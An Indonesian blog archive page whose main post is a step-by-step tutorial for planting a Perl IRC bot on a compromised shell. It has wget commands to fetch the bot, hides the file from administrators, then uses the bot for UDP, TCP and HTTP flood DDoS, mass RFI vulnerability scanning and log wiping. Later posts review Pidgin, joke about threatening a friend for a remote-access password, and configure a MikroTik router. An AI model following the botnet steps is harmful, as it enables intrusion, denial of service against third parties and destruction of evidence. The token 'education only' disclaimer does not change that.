Archives
Tutorial Bikin BOT Perl, DDOS dan MASS SCANNING VULN!
Author : Newbee
«-------------------------------------------------------------------------------------»
Oke, Ga usah banyak basa-basi, kalo ngerasa udah hacker gak usah baca nih tulisan. Bagi yang masih newbie kayak saya, langsung aja kamu sedot peralatan di bawah ini :
Peralatan Tempur :
1. File kambe.txt (source bot perl-nya) -->
Code:
http://momupload.com/files/89359/kambe.txt.html
2. File cmd2.txt -->
Code:
http://momupload.com/files/89360/cmd2.txt.html
3. File echo.txt -->
Code:
http://momupload.com/files/89358/echo.txt.html
4. Browser Mozilla Firefox -->
Code:
http://www.mozilla.com/en-US/firefox/
5. Mirc -->
Code:
http://www.mirc.com/get.html
Kalo smuanya sudah siap, sekarang kamu upload FILE CMD2.TXT dan FILE ECHO.TXT ke hostingan kamu. Kalo kamu belom punya hostingan, coba register aja ke hostingan2 gratis sepert http://www.ripway.com, http://www.geocities.com, dan lainnya.
Udah? Beneran?
Kalo 2 file tadi udah sukses dihosting, ambil linknya, misalnya aja linknya http://www.ripway.com/newbee/cmd2.txt dan http://h1.ripway.com/newbee/echo.txt. Dua link ini nanti kamu pakai untuk langkah berikutnya.
Langkah berikutnya? Afaan tuch?
Langkah itu adalah memodifikasi konfigurasi FILE KAMBE.TXT kamu. Coba buka pake program text editor seperti notepad misalnya. Coba kamu perhatikan bagian yang ini :
Image
Ada 7 poin yang kamu edit (yang ada di dalam tanda petik) :
1. Ganti dengan link FILE CMD2.TXT kamu tadi (http://h1.ripway.com/newbee/cmd2.txt)
2. Ganti dengan link FILE ECHO.TXT kamu tadi (http://h1.ripway.com/newbee/echo.txt)
3. Ganti dengan nick kamu di IRC, nick itu nanti yang dianggap sebagai admin bot
4. Ganti dengan nama channel IRC tempat Bot Perl nantinya join.
5. Ganti dengan nick Bot Perl-nya yang kamu mau.
6. Ganti dengan ident dan realname Bot Perl-nya (Gak diganti juga gak apa)
7. Kalo kamu mau Bot Perl-nya masuk server selain ke dalnet, silahkan kamu ganti aja bagian ini dengan nama server IRC yang kamu mau.
Udah keren Nick botnya? Udah gaul? Udah pas semua settingannya?
Cek lagi dech, ntar repot lagi klo ada yang salah.
Kalo bener-bener udah mantaf, langsung disimpan aja filenya, trus lanjut ke langkah berikutnya.
Langkah berikutnya? Afaan tuch?
Langkah itu adalah meng-upload FILE KAMBE.TXT tadi ke hostingan kamu yang tadi udah register. Kalo udah, ambil lagi linknya, misalnya http://h1.ripway.com/newbee/kambe.txt. Persiapkan link tersebut lalu kita meluncur menuju shell.
MANA SHELLNYA???
-_-! Dudul... Kan udah daku bilang tadi minta ama bandar-bandar shell-nya Yogyafree. Tuh adah indounderground, xshadow, inc0mp13te, dll, pada suka bagi-bagi shell gratis tuh mreka.. huehuehe :P :P :P :P :mrgreen:
Udah dapet shellnya?
Kalo udah sekarang cari direktori yang permission-nya 777 di shell.
Caranya eksekusi perintah : find / -type d -perm 777
Kalo uda dapet, baru masuk ke tuh direktori dan jalankan perintah2 ini :
1. Transfer FILE KAMBE.TXT dari hostingan kamu tadi ke dalam shell :
Code:
wget http://h1.ripway.com/newbee/kambe.txt
Kalo wget gak bisa, coba ganti pake lwp-download :
Code:
lwp-download http://h1.ripway.com/newbee/kambe.txt
2. Ubah ekstensi FILE KAMBE.TXT jadi KAMBE.PL biar berekstensi perl dan dihidden biar filenya agak susah ketauan ama admin target. Tanda titik di depan kambe.pl menandakan kalo file tersebut hidden :
Code:
mv kambe.txt .kambe.pl
3. Ganti permission KAMBE.PL jadi 755 biar bisa dieksekusi :
Code:
chmod 755 .kambe.pl
4. Eksekusi file KAMBE.PL :
Code:
perl .kambe.pl
Image
Kalo gak ada pesan error waktu perintah2 di atas dijalankan, berarti pembuatan bot sukses! Tapi klo di IRC tuh bot gak muncul2, berarti IP tuh bot dah diban sama IRC SERVER tersebut, coba aja ganti server IRC di editan KAMBE.TXT tadi dengan server lainnya
Bot-nya dah masuk IRC?
Kalo udah, coba baca-baca dulu perintah-perintah yang ada.
Ketik ini di channel IRC :
Code:
!kambe @help
Bot akan menampilkan help seperti ini :
Image
Nah perintah dengan nama !cmd (prefix-nya) itu smua diganti dengan !kambe, baru bisa jalan (huehuehue).
Oke, Saatnya DDOS!
Langkah-langkahnya :
1. Cari IP target atau Nama Situs target yang mau di DDOS.
2. Ada 3 Metode DDOS pada Bot ini :
- UDP Flood
Syntax Perintahnya : !kambe @udpflood
contohnya : !kambe @udpflood 212.1.3.5 9999999 9999999999999999999
- TCP Flood
Syntax Perintahnya : !kambe @tcpflood
contohnya : !kambe @tcpflood 212.1.3.5 21 9999999 9999999999999999
- HTTP Flood
Syntax Perintahnya : !kambe @httpflood
contohnya : !kambe httpflood http://www.kakus.com 9999999999999999999999
3. Hidupin rokok sambil chatting ngerayu cewe-cewe di IRC. :D
Image
MASS SCAN VULN
Langkah-langkahnya :
1. Cari bug dan dork RFI-nya.
Misalnya aja salah satu exploit RFI di Milw0rm : http://www.milw0rm.com/exploits/5624
Image
- bug : /ch_readalso.php?read_xml_include=
- dork : "Copyrights © 2005 Belgische Federale Overheidsdiensten"
2. Jalankan Perintah ini:
Syntax Perintahnya : !kambe @scan
contohnya :
!kambe @scan /ch_readalso.php?read_xml_include= "Copyrights © 2005 Belgische Federale Overheidsdiensten"
3. Hidupin rokok lagi sambil nunggu hasil scan keluar :D , jangan lupa puter lagu kangen band tadi yang udah didownload... biar gak sakit kepala melototin monitor :P
Image
Kalo uda slesai scan2an dan ddos2an-nya dan dah mau pulang, jangan lupa hapus log-nya, caranya ketik :
!kambe @logcleaner
Dan masih banyak lagi fitur bot ini seperti portscan, nmap, back connect, sendmail, dll.
««-=SELESAI=-»»
'Di balik dunia IRC bukan hanya sekedar untuk chatting dan ngejunk... But it could be a dangerous tool'
/* Tutorial ini hanya sekedar untuk edukasi dan pengetahuan tentang security.
Segala kerusakan atau kerugian yang terjadi karena penyalahgunaan tutorial ini
adalah bukan tanggung jawab saya */
By Newbee a.k.a Kambe
'Im just a single fighter'
Thanks to durhaka for the source
Siapa yang tidak kenal Yahoo Messenger, IRC, ICQ dan MSN, hampir semua Netter pasti mengenalnya, sebagian dari kita terkadang memiliki account messenger tersebut lebih dari satu atau bahkan banyak. Yang membuat kita terkadang bingung yaitu gimana kalo kita punya account YM lebih dari satu, atau misalkan begini punya account id YM dua, trus punya account ID ICQ satu, MSN satu, Facebook satu..., pasti tambah bingung dan harus nginstall semua aplikasi messenger yang bersangkutan, belon lagi pemakaian resourece memori yang jauh lebih boros jika kita harus menjalankan semua aplikasi Client Chat yang bersangkutan, wahhh gak kebayang, bisa tambah lelet tuh komputer...
Untuk memecahkan masalah diatas sebaiknya gunakan program pidgin yang tersedia dengan gratis, program ini berukuran 14 MB lebih, dapat digunakan untuk chatting dengan jaringan chat AIM, ICQ, Google Talk, Jabber/XMPP, MSN Messenger, Yahoo!, Bonjour, Gadu-Gadu, IRC, Novell GroupWise Messenger, QQ, Lotus Sametime, SILC, SIMPLE, MySpaceIM, dan Zephyr, dengan menggunakan plugin tambahan program juga dapat digunakan untuk chatting dengan pemakai facebook. pidgin juga tersedia dalam bahasa indonesia, jadi bagi kita yang kurang mengerti bahasa inggris, tidak akan mengalami kesulitan menggunakan program ini.
Hanya dengan menginstall program ini anda sudah bisa chat dengan teman - teman lainnya, kekurangan dari program ini adalah, tidak adanya fungsi webcam dan audio call, jadi bagi anda yang terbiasa chat sambil menggunakan webcam, terpaksa harus menggunakan program asli chat client yang bersangkutan. Yang menarik program ini juga bisa digunakan untuk chating dengan pemakai IRC yang memiliki anggota chating terbanyak sampai saat ini.
Anda bisa mendonwload langsung program ini di www.pidgin.im, gratis tanpa dibungut biaya apapun, bahkan source code program juga disediakan disini, bagi anda yang mengerti silahkan mengotak - atik sourcenya.
Memang dengan cara - cara tertentu kita juga dapat menggunakan ID YM lebih dari satu dalam satu komputer, tapi dengan satu YM aja pemakaian resource memory dan procesor sudah kerasa, apalagi yang menggunakan komputer p4 kebawah, sebagai perbandingan saja, pidgin yang login menggunakan ID YM dua memakan resource memory sebesar 22 M, sementara YM 8.1 dengan ID YM satu saja sudah memakan resource memory sebesar 55 MB luarrr biasa bukan, apalagi kalo kita menggunakan fitur webcam dan audio call nya, mungkin lebih parah lagi, bisa - bisa 70 MB an mungkin.
Download : http://www.indowebster.com/Pidginfacebook.html
Banyak yang bertanya sama gw, tentang bagaimana cara meremote atau mengontrol PC orang dari jarak jauh bahkan antar pulau yang gampang dan gak ribet.
Gw pasti bilang “Mau yang Legal atau Ilegal..?” Kalo yang ilegal sih gak semudah itu dan gw juga gak bisa, xixixixi.. kalo yang Legal sih gampang, bahkan anak kecil juga bisa tuh..
OK gak perlu basa-basi lagi, ikuti caranya sebagai berikut :
1. Silahkan download App-nya di www.showmypc.com ukuran file tidak lebih dari 2MB. Lalu jalan kan App itu di computer lo (akan terlihat seperti ini)
2. Lalu ajak temen lo menjalankan App itu juga sehingga masing-masing computer telah terpasang App yang sama. (Ok gw anggap App dah terpasang yah)
3. Suruh temen lo untuk meng-generate Passwordnya dengan cara meng-klik tombol “Show My PC Now” maka secara otomatis App ini meng-generate Password yang bisa lo gunakan untuk mengontrol PC temen lo itu. (Lihat gambar)
4. Jika temen lo sudah sukses menggenerate-nya maka suruh temen lo untuk mengirimkan passwornya ke lo. (Klo gak mau paksa aja, klo gak ancem aja klo lo bakal rusakin system computernya klo gak kasih passwornya) hahaha.
5. Setelah lo dapatkan passwordnya sekarang giiliran lo untuk bekerja! Sekarang klik tombol “View Remote PC” lalu show my pc akan meminta password, masukan password yang temen lo kirim itu.
6. Tunggu deh sampai proses koneksi selesai, gak akan lama kok kurang dari 1 menit. Jika koneksi failed ulangi lagi sampai berhasil.
7. Sekarang terserah lo! Mau kamu apakan PC temen lo itu.Sumber : http://www.ciebal.web.id Read More..
Skema Jaringan dan IP Address yang akan dibuat:
SPEEDY (Internet) –> Modem ADSL (IP modem=192.168.1.1) –> (IP ether1=192.168.1.2) Mikrotik Routeros (IP ether2=10.0.0.30) –> LAN (IP LAN=10.0.0.1 s/d 10.0.0.29)
IP Address LAN, kita gunakan network 10.0.0.0/27 (transfer data =27 bit untuk maks 30 IP Address/komputer).
Untuk Mikrotik RouterOS, kita perlu dua ethernet card. Satu (ether1 - 192.168.1.2/24) untuk sambungan ke Modem ADSL dan satu lagi (ether2 - 192.168.0.1) untuk sambungan ke LAN/switch.
Untuk Modem ADSL, IP kita set 192.168.1.1/24.
Pastikan Anda sebelum mengetikkan apapun, telah berada pada root menu dengan mengetikkan “/”
1. Set IP untuk masing² ethernet card:
ip address add address=192.168.1.2/24 interface=ether1
ip address add address=192.168.0.1/24 interface=ether2
Untuk menampilkan hasil perintah di atas ketikkan perintah berikut:
ip address print
Kemudian lakukan testing dengan mencoba nge-ping ke gateway atau ke komputer yg ada pada LAN. Jika hasilnya sukses, maka konfigurasi IP Anda sudah benar
ping 192.168.1.1
2. Menambahkan Routing
ip route add gateway=192.168.1.1 (IP Gateway adalag IP modem)
3. Setting DNS
ip dns set primary-dns=203.130.193.74 allow-remote-requests=yes
ip dns set secondary-dns=202.134.0.155 allow-remote-requests=yes
Karena koneksi menggunakan Speedy dari Telkom, maka DNS yg kita gunakan DNS Telkom. Silahkan sesuaikan dengan DNS Telkom masing tempat Anda berada.
Setelah itu coba Anda lakukan ping ke yahoo.com misalnya:
ping yahoo.com
Jika hasilnya sukses, maka settingan DNS sudah benar
4. Source NAT (Network Address Translation) / Masquerading.
Agar semua komputer yg ada di LAN bisa terhubung ke internet juga, maka Anda perlu menambahkan NAT (Masquerade) pada Mikrotik.
ip firewall nat add chain=srcnat action=masquerade out-interface=ether1
Sekarang coba lakukan ping ke yahoo.com dari komputer yang ada di LAN
ping yahoo.com
Jika hasilnya sukses, maka setting masquerade sudah benar
5. DHCP (DynamicHost Configuration Protocol)
Supaya praktis, kita gunakan saja DHCP Server. Agar setiap ada klien yang ingin konek, dia ga perlu setting IP secara manual. Tinggal obtain aja dari DHCP Server, beres dah. Untungnya Mikrotik ini juga ada fitur DHCP Servernya. Jadi ya ga ada masalah… OK! Langkah2nya sbb:
Buat IP Address Pool
ip pool add name=dhcp-pool ranges=192.168.0.2-192.168.0.200
Menambahkan DHCP Network
ip dhcp-server network add address=192.168.0.0 gateway=192.168.0.1dns-server=203.130.193.74,202.134.0.155
Menambahkan Server DHCP
ip dhcp-server add name=DHCP_LAN disabled=no interface=ether2 address-pool=dhcp-pool
Sekarang coba lakukan testing dari komputer klien, untuk me-request IP Address dari Server DHCP. Jika sukses, maka sekali lagi, settingannya sudah OK.
6. Bandwidth Control
Agar semua komputer klien pada LAN tidak saling berebut bandwidth, maka perlu dilakukan yg namanya bandwidth management atau bandwidth control
Model yg saya gunakan adalah queue trees. Untuk lebih jelas apa itu, silahkan merujuk ke situsnya Mikrotik. (http://mikrotik.co.id)
Kondisinya seperti ini:
Koneksi Speedy sekarang ini katanya speednya sampai 1Mbps/128kbps (Download/Upload). Untuk itu setingan bandwidth management nya bisa kita set sbb berikut:
Tandai semua paket yg asalnya dari LAN
ip firewall mangle add src-address=192.168.0.0/24 action=mark-connection
ip firewall mangle add connection-mark=Clients-con action=mark-packet new-packet-mark=Clients chain=prerouting new-connection-mark=Clients-con chain=prerouting
Menambahkan rule yg akan membatasi kecepatan download dan upload
queue tree add name=Clients-Download parent=ether2 packet-mark=Clients limit-at=0 max-limit=0
queue tree add name=Clients-Upload parent=ether1 packet-mark=Clients limit-at=0 max-limit=0
Nilai download dan upload kita set “0″ (nol) dengan tujuan agar bandwidth yang kita dapatkan tidak terbatasi. Karena pada saat-saat tertentu speed speedy bisa mencapai 1,5Mbps. Jadi kalo kita set maks=1mbps maka speed yang kita dapatkan hanya mentok 1mbps saja. rugikan
Sekarang coba lakukan test download dari beberapa klien, mestinya sekarang tiap2 klien akan berbagi bandwidthnya. Jika jumlah klien yg online tidak sampai 10, maka sisa bandwidth yang nganggur itu akan dibagikan kepada klien yg online.
7. Graphing
Mikrotik ini juga dilengkapi dengan fungsi monitoring traffic layaknya MRTG biasa. Jadi kita bisa melihat berapa banyak paket yg dilewatkan pada PC Mikrotik kita.
tool graphing set store-every=5min
Berikutnya yang akan kita monitor adalah paket² yg lewat semua interface yg ada di PC Mikrotik kita.tool graphing interface add-interface=all store-on-disk=yes
Sekarang coba arahkan browser anda ke IP Router Mikrotik (IP ether2 yang ke LAN)
http://192.168.0.1/graphs/
Nanti akan ada pilihan interface apa aja yg ada di router Anda. Coba klik salah satu, maka Anda akan bisa melihat grafik dari paket2 yg lewat pada interface tersebut.